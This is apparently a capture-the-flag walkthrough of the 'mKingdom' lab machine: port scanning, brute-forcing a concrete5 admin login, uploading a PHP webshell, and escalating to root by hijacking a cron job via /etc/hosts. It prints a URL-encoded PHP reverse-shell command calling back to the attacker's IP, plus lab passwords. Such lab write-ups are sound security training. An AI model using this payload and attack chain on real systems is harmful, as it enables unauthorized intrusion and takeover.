mKingdom

a103492dd479268d17455b8d59da3ff1.png

Target IP: 10.10.195.160
Challenge Description: Try to root the machine!


Reconnaissance

7999aa21d3b97048c07a742e8374ab99.png
To begin the challenge, I performed a TCP port scan against the target machine using the command sudo nmap -sS 10.10.195.160 -p- and obtained the result shown above. By the looks of it there is only one TCP port open on the target machine: port 85.

c15327f1140fe6eb1bff1c7a1cb9cd32.png
I performed an aggressive TCP port scan using the command sudo nmap -sV -A 10.10.195.160 -p 85 and obtained the result shown above. By the looks of it, the target machine seems to be running HTTP on port 85. I performed a subdomain enumeration but I did not find anything useful. Time to enumerate this port further.


Enumeration

Port 85: HTTP
f4cb2c085b56bab66e76d5be67547931.png
I performed a scan against the web server on port 85 using the command nikto -h http://10.10.195.160:85 and obtained the result shown above. The scan successfully identified the interesting result shown above. There is an interesting directory with the name /app. Time to performed a directory search to identify any other useful directories.

430973fa0134b06aab62c2024374921e.png
Running a directory search using the command gobuster dir -u http://10.10.195.160:85 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt also successfully identified the /app directory.

14642260744fffd188c225f501c2eb47.png
Browsing to http://10.10.195.160:85/ returns the webpage shown above. Scanning the source-code of the webpage did not result in anything useful either. Time to visit the /app directory now.

3d7c6c33a40aaca9c58b7286dd7c94db.png
Browsing to /app directory returns the webpage shown above. This webpage has one button with the text JUMP.

<button onclick="buttonClick()">JUMP</button>

    <script>
        function buttonClick() {
            alert("Make yourself confortable and enjoy my place.");
            window.location.href = 'castle';
        }
    </script>
<button onclick="buttonClick()">JUMP</button>

    <script>
        function buttonClick() {
            alert("Make yourself confortable and enjoy my place.");
            window.location.href = 'castle';
        }
    </script>

Viewing the source-code of the /app webpage contains the script shown above. Pressing the JUMP button seems to execute the script above. It seems to redirect to /castle.

0a6c04f3505d8f02c4f8735c81b4802d.png
I pressed the button from the previous image and the webpage above was returned to me. After some manual enumeration, I found possible usernames such as toad, toadette, etc.

e0d50583473617551a68da6febfcc29e.png
Viewing the source-code of the webpage, I managed to obtain the application name and version concrete5 - 8.5.2 as shown above. Is the web application vulnerable? Time to find out.

6492a136467cd3c5d96b0a199f3f84a5.png
I did a Google search for concrete5 8.5.2 vulnerabilities and found the webpage shown above. This application version is vulnerable to RCE by the looks of it. However, I will require admin privileges to perform RCE. This website also contains the steps on how to compromise this web application after obtaining an admin access. Maybe I can reproduce the steps after gaining admin credentials?

e4e154cf67645d0b8e71bade7b28baba.png
I found the login webpage. However, I sprayed default credentials such as admin:admin and admin:root, but I had no luck. Time to bruteforce the logins. I fired-up Burpsuite on my machine and intercepted a login request.

0e55383bd5c98cc84f34a96bdcfd4d0e.png
I tried to bruteforce the password of the user admin and got a hit using the Intruder tool and its sniper attack. The only change I made is to the password field. I used the password file 10-million-password-list-top-1000.txt. And I successfully obtained the credentials admin:password, as shown above.

b51fa77d48895feebcca0c07ad88a7b9.png
And bingo! Now I have admin access on the web application using the credentials admin:password. Now I can use the website I found earlier and follow the steps to upload a reverse shell.


Exploitation

Owning the Web Application: Webshell Upload via File Upload Attack
e5ee6857da4533008722d1f2ad584f54.png
The steps to reproduce to gain an RCE on the target machine are shown above.

2615286d767484495dfc4ef5134ce915.png
I inserted php inside the Allow File Types list, as shown above.

93151c4c6af9d8114c07d57001d8ed40.png
On my machine, I created a simple PHP webshell with the name shell.php. The content of this PHP webshell is shown above. Time to upload my PHP webshell using the File Manager on the target machine now.

2d2d8e49d1edb7fd304a687e7e4e8b74.png
I uploaded my PHP webshell as shown above. However, I will need to find the location of this script so I can perform RCE. I right-clicked on the shell.php file and then Properties.

Foothold: RCE via Webshell & Reverse Shell Connection
1eac164aacc959437c78b9521eeff6de.png
I notice my webshell is being served at http://10.10.195.160:85/app/castle/application/files/2817/1857/1519/shell.php. Time to visit this URL to perform RCE. And perfect! Now I can perform RCE. I managed to successfully execute the commands ls;whoami;id and obtained the result shown above. Time to obtain a reverse shell connection now. I started a listener on my machine at port 8443 first.

8871ae8de25e3db22e4a9bc5f269a0dc.png
Then using my PHP webshell, I deployed the reverse shell command php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fsh%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27 and obtained a reverse shell connection at port 8443. The full URL with the reverse shell payload is http://10.10.195.160:85/app/castle/application/files/2817/1857/1519/shell.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fsh%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27. Now I have a foothold on the target machine as the user www-data. Time to elevate my privileges to obtain a root shell :)


Privilege Escalation

Horizontal Privilege Escalation: www-data to Mario
85a22b5fec3e7c737325571a41f59394.png
On the target machine, I notice there are two users: toad and mario. After some manual enumeration, I found an interesting filename called database.php which contains the password toadisthebest. This password seems to belong to the user toad too. Can I switch user using this new password?

6ae4c3747f96ad027d0b411b95e7c46f.png
And bingo! I ran the command su toad and the password toadisthebest and got a hit. I managed to successfully elevate my privileges to the user toad from www-data, as shown above.

2e7b4d7765aab869abf4925f3062cb3a.png
Running the command env to list all environmental configs seems to contain an interesting entry with the name PWD_token and the value aWthVGVOVEFOdEVTCg==, as shown above. I can use Cyberchef to decode this. After decoding it, I obtained the string ikaTeNTANtES. Does this password belong to the user mario? Time to find out.

98449d862d47ab9789a04f3de5fdece2.png
And bingo! The password belongs to the user mario, as shown above. I was able to successfully switch to this user.

Vertical Privilege Escalation: Mario to Root via Domain Hijacking & Cronjob Execution
65c3137b278be4d285d2f78dea036bad.png
I transferred pspy64 to the target machine and executed it. After waiting for some time, I obtained the interesting output shown above. The command /bin/sh -c curl mkingdom.thm:85/app/castle/application/counter.sh looks the most interesting to me, as it seems to be executing the script counter.sh located at /app/castle/application/ on the domain name mkingdom.thm:85. The attack vector I can use is domain hijacking. This is possible by editing the /etc/hosts to point to my machine. And then creating & serving a malicious reverse shell script with the name counter.sh at /app/castle/application/ on my machine at port 85.

ce533abfb818b6169c00ed3ae27e5283.png
On my machine, I created the same directory and the malicious script with the name counter.sh as shown above. Then I started a Python HTTP server at port 85 by using the command python3 -m http.server 85. Time to edit the /etc/hosts file on the target machine and insert my machine's IP address for the domain name mkingdom.thm.

cc26573ef6910a38762cc3e379aa2e1b.png
I made changes as shown above to the /etc/hosts file using nano on the target machine. The entry above contains my IP address for the domain name mkingdom.thm. Then I started a listener on my machine at port 8444.

105ea0c2526308558daa7b99d1f6d2c1.png
And bingo. I waited for some time, and then I obtained a root shell on port 8444, as shown above.


Flags

6f4dccf96429f0512376e91612678cd7.png
The two flags are shown above. I had to read the flags using the tail command, as cat did not work. GG.